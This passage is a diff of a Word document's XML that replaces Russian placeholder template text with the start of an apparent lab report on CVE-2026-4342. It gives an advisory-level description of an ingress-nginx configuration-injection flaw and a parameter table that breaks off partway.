-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Общий список требований включает такие моменты:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:numPr>
-          <w:ilvl w:val="0"/>
-          <w:numId w:val="8"/>
-        </w:numPr>
-        <w:ind w:left="0" w:firstLine="900"/>
-      </w:pPr>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>Перечисление</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст текст текст текст текст текст текст текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading3"/>
-        <w:numPr>
-          <w:ilvl w:val="2"/>
-          <w:numId w:val="25"/>
-        </w:numPr>
-        <w:rPr>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc210601679"/>
-      <w:r>
-        <w:t>Подраздел 3 уровня 2</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="8"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>Текст текст текст текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:t>текст</w:t>
-      </w:r>
-      <w:r>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="0"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:br w:type="page"/>
+      </w:r>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading1"/>
@@ -4672,1630 +4157,1032 @@
           <w:ilvl w:val="0"/>
           <w:numId w:val="25"/>
         </w:numPr>
-        <w:rPr>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:br w:type="page"/>
-      </w:r>
-      <w:bookmarkStart w:id="9" w:name="_Toc210601680"/>
+      </w:pPr>
+      <w:bookmarkStart w:id="23" w:name="_Toc231073620"/>
       <w:r>
         <w:lastRenderedPageBreak/>
-        <w:t>Раздел 2</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="9"/>
-    </w:p>
-    <w:p>
-      <w:r>
-        <w:t>В</w:t>
-      </w:r>
-      <w:r>
-        <w:t>водная часть по разделу</w:t>
-      </w:r>
-    </w:p>
-    <w:p/>
+        <w:t>Ход работы</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="23"/>
+    </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Heading2"/>
         <w:numPr>
           <w:ilvl w:val="1"/>
-          <w:numId w:val="25"/>
+          <w:numId w:val="39"/>
         </w:numPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="24" w:name="_Toc231073621"/>
+      <w:r>
+        <w:t xml:space="preserve">исследование </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>CVE</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">в экосистеме </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="24"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">CVE-2026-4342 обнаружена в механизме </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">Суть уязвимости заключается в том, что пользователь, имеющий доступ к </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">мог добавить такое сочетание </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>аннотаций</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">которое позволит внедрить определенную конфигурацию в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Данное внедрение позволяет запустить произвольный код в контексте </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">. Проблема заключается в том, что данный контроллер распределяет </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>https</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">трафик на рабочие ноды и может управлять объектами </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Service</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">, а доступ к данному контроллеру позволяет раскрыть данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">и перехватывать </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>https</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">трафик на уровне </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="3194"/>
+        <w:gridCol w:w="6807"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="475"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Параметр</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Значение</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="462"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Идентификатор</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:t>CVE-2026-4342</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="490"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Уязвимый компонент</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:tbl>
+            <w:tblPr>
+              <w:tblW w:w="94" w:type="dxa"/>
+              <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              <w:tblCellMar>
+                <w:top w:w="15" w:type="dxa"/>
+                <w:left w:w="15" w:type="dxa"/>
+                <w:bottom w:w="15" w:type="dxa"/>
+                <w:right w:w="15" w:type="dxa"/>
+              </w:tblCellMar>
+              <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+            </w:tblPr>
+            <w:tblGrid>
+              <w:gridCol w:w="96"/>
+            </w:tblGrid>
+            <w:tr>
+              <w:trPr>
+                <w:trHeight w:hRule="exact" w:val="12"/>
+                <w:tblCellSpacing w:w="15" w:type="dxa"/>
+              </w:trPr>
+              <w:tc>
+                <w:tcPr>
+                  <w:tcW w:w="0" w:type="auto"/>
+                  <w:vAlign w:val="center"/>
+                  <w:hideMark/>
+                </w:tcPr>
+                <w:p>
+                  <w:pPr>
+                    <w:ind w:firstLine="0"/>
+                    <w:rPr>
+                      <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+                    </w:rPr>
+                  </w:pPr>
+                </w:p>
+              </w:tc>
+            </w:tr>
+          </w:tbl>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Kubernetes ingress-nginx controller</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="475"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Тип уязвимости</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Ngingx</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> Configuration Injection</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="351"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>CWE</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>CWE-20</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="858"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Затронутые версии</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Ingress-nginx &lt; 1.13.9,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ingress-nginx &lt; 1.14.5,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>ingress-nginx &lt; 1.15.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:trPr>
+          <w:trHeight w:val="872"/>
+        </w:trPr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3194" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Исправленная версия</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="6807" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:ind w:firstLine="0"/>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t>Ingress-nginx 1.13.9,</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
